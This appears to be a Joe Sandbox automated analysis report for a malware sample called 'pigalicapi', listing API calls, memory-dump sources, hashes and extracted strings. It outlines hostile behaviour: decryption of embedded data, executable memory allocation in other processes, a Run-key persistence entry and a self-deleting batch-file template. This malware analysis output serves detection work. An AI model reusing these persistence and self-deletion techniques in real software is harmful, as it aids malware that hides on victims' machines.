                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,009D6C42,00000000,00000000,?,00000000,00000001,00000000,?,009D6670,00000000,00000000,?), ref: 009D6B9E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743577244.00000000009D6000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D6000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_9d6000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                          • Opcode ID: 155cb44f56700499559c699fa88ca25f1edce0c1cd65970cabd6a13214daa310
                                                                                                                                                                                                                                                          • Instruction ID: 29fe5fa844a845fdb6c3e3b632d05b5be53c9e165d47d6b01c42199b4cfe6851
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 155cb44f56700499559c699fa88ca25f1edce0c1cd65970cabd6a13214daa310
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCD05B366402147BDB105E94DC01FA9B75CDF44760F108025FD5897340D571BD1047D4
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00A18D3F
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00A18D49
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00A1C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A18D78
                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00A18D99
                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 00A18DB1
                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 00A18DD5
                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00A18DF1
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 00A18DFE
                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 00A18E08
                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00A18E14
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A18D30
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A18D68
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                          • API String ID: 3718126946-947817771
                                                                                                                                                                                                                                                          • Opcode ID: bf3c6aea32d6613d2c2901c5c7d242a1e24c599809d24156219d0b5d65c515d4
                                                                                                                                                                                                                                                          • Instruction ID: 70a48953a686763ff4de741aa08fe3ca5ab94c9e9a8e7d98d46e8e269a761091
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf3c6aea32d6613d2c2901c5c7d242a1e24c599809d24156219d0b5d65c515d4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13310C75A80209FFDB14CFE4DC89BEE77B9BB48705F148518F601A61C0CBB89A85CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,?,00000001,?,?,?,?), ref: 005643C8
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00564486
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateExitFileProcess
                                                                                                                                                                                                                                                          • String ID: 2$e$xnZ$xnZ$xnZ$xnZ$xnZ$<
                                                                                                                                                                                                                                                          • API String ID: 2838702978-2715957930
                                                                                                                                                                                                                                                          • Opcode ID: 1b80c7014c889042eee88e8913b37ac39ed33b28341043aee7cd96882b6a85ea
                                                                                                                                                                                                                                                          • Instruction ID: bd3378daec968960cd78fbd69b01473cbe36dbd0c823ad498fa9d7bd6c6611ff
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b80c7014c889042eee88e8913b37ac39ed33b28341043aee7cd96882b6a85ea
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22C109B5508200DFE304CF29E984A2BBBF9FB9A304F49452DF489973A5D775AC08DB52
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 00A12564
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 00A12590
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 00A125B0
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A125CA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3668210933-0
                                                                                                                                                                                                                                                          • Opcode ID: 030edc6affb51f914fd9e5f61e0cf9f124b21c7677da8852be26ebcd28491a92
                                                                                                                                                                                                                                                          • Instruction ID: c16323363ca4511b3cd8b0fec02df4657b99c68977d1b956c8eedd38c75e873b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 030edc6affb51f914fd9e5f61e0cf9f124b21c7677da8852be26ebcd28491a92
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 745108B5E40209EFDB08CF94C895FEEB7B5FB48304F108548E615AB290D774EA91CBA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,?,?,?,?,?,005A6E78,005646DE,?,?,?,005A6E78,?), ref: 005639DD
                                                                                                                                                                                                                                                          • GetCurrentActCtx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000A3CE2,?,?), ref: 005639F2
                                                                                                                                                                                                                                                          • GetNamedPipeInfo.KERNEL32(?,?,?,-005A6F61,?,?,?,?,?,005A6E78,005646DE,?,?,?,005A6E78,?), ref: 00563B0F
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000A3CE2,?,?), ref: 00563B1E
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$CurrentDeleteInfoModuleNameNamedPipe
                                                                                                                                                                                                                                                          • String ID: xnZ$<
                                                                                                                                                                                                                                                          • API String ID: 3443511401-3267282259
                                                                                                                                                                                                                                                          • Opcode ID: 8eb55d17e0f21401f978ee6539c9db4fbee69d3b3a378147223019fe18479867
                                                                                                                                                                                                                                                          • Instruction ID: a295ff34c39781c8d21c9becaeb54ce075490ccbf024b6ec1acfdaae52721fb0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8eb55d17e0f21401f978ee6539c9db4fbee69d3b3a378147223019fe18479867
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FC12575604601CFD314CF28D985AABBBF9FB98304F084A2DE49ACB2A1C771F949DB51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetNamedPipeHandleStateA.KERNEL32(?,?,00000001,?,?,00000000,000B654C), ref: 0056477B
                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 005647E8
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExitHandleNamedPipeStateThread
                                                                                                                                                                                                                                                          • String ID: xnZ
                                                                                                                                                                                                                                                          • API String ID: 2345884422-3580042809
                                                                                                                                                                                                                                                          • Opcode ID: 2668c0518b96bafe4a6179f3ef749b7586927a81fc97ce6a3cda9234bb4c2227
                                                                                                                                                                                                                                                          • Instruction ID: ca7c4be01cf701d14e24418e4f6835d0eb5bbeef618e7fa2f355999b24b15ad5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2668c0518b96bafe4a6179f3ef749b7586927a81fc97ce6a3cda9234bb4c2227
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91A18776604202CFD354CF38D881A87B7E5FB99304F098A79E189DB2A1D774E989CF81
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00561204: VirtualAlloc.KERNEL32(00000000,00020000,00003000,00000040), ref: 0056129B
                                                                                                                                                                                                                                                          • GetCurrentActCtx.KERNEL32(?,?,?,005A6E78,?,005641FC,005A6E78,?,?,?,?,?,?), ref: 00571CDE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocCurrentVirtual
                                                                                                                                                                                                                                                          • String ID: xnZ$xnZ
                                                                                                                                                                                                                                                          • API String ID: 2766526180-130287408
                                                                                                                                                                                                                                                          • Opcode ID: 6c99d5d0b1b0031548e3c7c8445f0a9d8f9da12a28c678f78b80a295f590baca
                                                                                                                                                                                                                                                          • Instruction ID: 11353dbc3170df0abe232d7718b26457db94abd939d323674431def1b89b2411
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c99d5d0b1b0031548e3c7c8445f0a9d8f9da12a28c678f78b80a295f590baca
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1615476600201DFD750CF6CD984E9A7BE8FB89300F088AB9E949DB256D731E909DB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetNamedPipeHandleStateA.KERNEL32(?,00000000,?,00000000,?,000304A7,?), ref: 00570FC7
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HandleNamedPipeState
                                                                                                                                                                                                                                                          • String ID: xnZ$xnZ
                                                                                                                                                                                                                                                          • API String ID: 2980779144-130287408
                                                                                                                                                                                                                                                          • Opcode ID: 638af07657b90d7097769b2a69ee3083dd3d8ca90eb3b4a42eeec462b33ca65a
                                                                                                                                                                                                                                                          • Instruction ID: 4eaed5c4f21710d3429b64c648dfd731d9f357208bdd2bcf593262533db7989c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 638af07657b90d7097769b2a69ee3083dd3d8ca90eb3b4a42eeec462b33ca65a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71711475200602CFD364CF38D984B97BBE9FB59304F088A6DE49ACB255D770B849DB11
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentDirectoryA.KERNEL32(?,?,?,?,?,?,005700BA,?,?,?,?,?,?,000A3CE2,?,?), ref: 00563FEA
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                                                                                          • String ID: xnZ$<
                                                                                                                                                                                                                                                          • API String ID: 1611563598-3267282259
                                                                                                                                                                                                                                                          • Opcode ID: 638a0da0775e646fac2511455991c53f7210797b9994c89ffcde5e7176b282d2
                                                                                                                                                                                                                                                          • Instruction ID: e22e4eb3f40e9919966d776e78bc43938f0a5dff457a81026cfafa84a6c91bc1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 638a0da0775e646fac2511455991c53f7210797b9994c89ffcde5e7176b282d2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02714535600601CFD314CF38DA84A97BBF8FB69300F18896AE59ACB2A1D771A949DF51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(FFFF85FD,?,?,00000001,?,?), ref: 00570670
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2742573587.0000000000561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742484709.0000000000560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742672469.0000000000572000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2742818522.000000000058E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743005491.00000000005A6000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2743116623.00000000005A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_560000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                                                          • String ID: @'W$xnZ
                                                                                                                                                                                                                                                          • API String ID: 2422867632-1284469520
                                                                                                                                                                                                                                                          • Opcode ID: a2a02c83ed5e0a8c5d41e6e69fb3f19186a4e969f3608b42fb51ce18209b09be
                                                                                                                                                                                                                                                          • Instruction ID: 3d451c5758b4bc5c50a7fbcea6f3718f0cb7eae990e67fb14b5d2a4ad4388969
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2a02c83ed5e0a8c5d41e6e69fb3f19186a4e969f3608b42fb51ce18209b09be
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49511535200641CFD328CF28E980A67B7F5FB69300F598A6DE58ACB261CB70F849DB11
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00A174E4
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 00A17503
                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 00A1752E
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00A1C650), ref: 00A17559
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,pigalicapi), ref: 00A1756B
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.exe), ref: 00A1757D
                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 00A1758F
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 00A175B4
                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(000001EC,00000001), ref: 00A175CE
                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,00A1C690,00000000,00000002,00000000), ref: 00A17620
                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 00A17636
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00A17643
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 00A1766F
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00A1767C
                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 00A17698
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.bat), ref: 00A176AA
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00A176C6
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000000), ref: 00A176F9
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,00000000), ref: 00A1770E
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00A1771B
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00A1778C
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00A1779D
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00A177A5
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                          • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf$software\microsoft\windows\currentversion\run
                                                                                                                                                                                                                                                          • API String ID: 3221898725-1842671280
                                                                                                                                                                                                                                                          • Opcode ID: 14690dd00fa3f8842bee289657f6793f22f2faf1c4f2cd560ab992dcbfb806dd
                                                                                                                                                                                                                                                          • Instruction ID: 8aea9422ae546f56adcedb00cf2c8b54d8aa48827b4d45e69668375539184298
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14690dd00fa3f8842bee289657f6793f22f2faf1c4f2cd560ab992dcbfb806dd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38718BB1980318EBEB20DBA0DC49FEA7779BB48710F0485D8F219A5091DBB49BC5CF50
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 00A16DC9
                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00A16DD1
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A16E5F
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 00A16EB5
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 00A16EDD
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00A16F7A
                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00A177B0,?,00000000,00000000), ref: 00A16FE3
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00A16FF0
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 00A17028
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00A17059
                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 00A17077
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00A17093
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00A17101
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 00A1715D
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 00A17183
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00A171A9
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 00A171BC
                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00A17239
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                                                                                          • String ID: TEMP
                                                                                                                                                                                                                                                          • API String ID: 3110491842-1036413054
                                                                                                                                                                                                                                                          • Opcode ID: e13bf3b90df0a85152571e9a00f02447e08c1b822c8c4120980cc158dea9e7ac
                                                                                                                                                                                                                                                          • Instruction ID: 63a2aa5020557f7c0a7e0a6dec3d471023e7d46b935783f93a08cbcb55ed9fa5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e13bf3b90df0a85152571e9a00f02447e08c1b822c8c4120980cc158dea9e7ac
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1F10975A04218EFDB14DF94D985FDEB7B5BB88300F248298E509AB391D771AE82CF50
                                                                                                                                                                                                                                                          Uniqueness

